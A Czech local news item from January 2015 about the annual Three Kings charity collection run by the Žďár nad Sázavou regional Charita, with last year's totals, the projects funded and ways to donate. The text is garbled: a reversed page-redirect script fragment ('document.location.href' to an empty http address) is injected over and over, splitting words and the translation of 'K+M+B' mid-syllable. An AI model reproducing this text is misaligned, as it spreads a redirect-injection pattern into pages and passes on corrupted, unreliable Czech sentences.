sbírka
Rainbow page separator

Tříkráloví koledníci již po patnácté v ulicích

Čtvrtek, 1. ledna 2015

Tříkrálová sbírka - Jiříkovice

V celé České republice vyráží dnes do ulic skupinky Tří králů, aby přinášely lidem poselství o narození Krista. Tři koledníky je možné již po patnácté potkat v ulicích obcí a měst v období od 1. do 14. ledna 2015.

Koledníci mají úředně zapečetěnou kasičku s logem Charity ČR. Vedoucí skupiny má u sebe průkazku. Tři králové, kteří obcházejí domácnosti, napíší zájemcům na dveře křídou písmena K+M+B+. Jedná se o zkratku latinského „Christus mansionem benedicat“, tedy „Kristus žehnej [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to domu“.
„V roce loňském darovali lidé do 397 zapečetěných kasiček Oblastní charity Žďár nad Sázavou celkem 2 522 626,60 Kč. Do koledování se zapojilo přes 1 600 dobrovolníků,“ sdělila Veronika Dobrovolná, koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka sbírky.
Tříkrálová sbírka roku 2014 podpořila ve žďárské Charitě následující projekty:

  • rekondiční poby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou akci uživatelů Klubu v 9 – centra služeb pro podporu duševního zdraví,
  • zdravotně – sociální centrum Hippokrates pro seniory v Moldavsku,
  • humanitární pomoc pro obyvatele Ukrajiny,
  • terénní služby Osobní asistence, Charitní ošetřovatelské služby, Charitní pečovatelské služby, Sociálně aktivizačních služeb pro rodiny s dětmi, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nákupem au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů pro zkvalitnění a rozšíření služeb,
  • rozvoj služby Osobní asistence – dokrytí provozních nákladů,
  • fond humanitární pomoci pro potřebné našeho regionu,
  • dobrovolnické centrum Kambala.

V roce 2015 použije žďárská Charita finance získané ze sbírky na zajištění provozu a rozvoje jednotlivých zařízení Oblastní charity Žďár nad Sázavou a humanitární a mezinárodní pomoc.

Sbírku je možné podpořit také převodem na bankovní účet Tříkrálové sbírky číslo 66008822/0800, v.s. 6800, vedený u České spořitelny, nebo zasláním dárcovské SMS ve formě DMS KOLEDA na číslo 87 777 (Cena jedné DMS je 30 Kč, Charita obdrží 27 Kč).
Koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka sbírky za Oblastní charitu Žďár nad Sázavou
Veronika Dobrovolná
mob.: 777 755 444, e-mail: dc@zdar.charita.cz

Lenka Šustrová

Tříkrálová sbírka  2015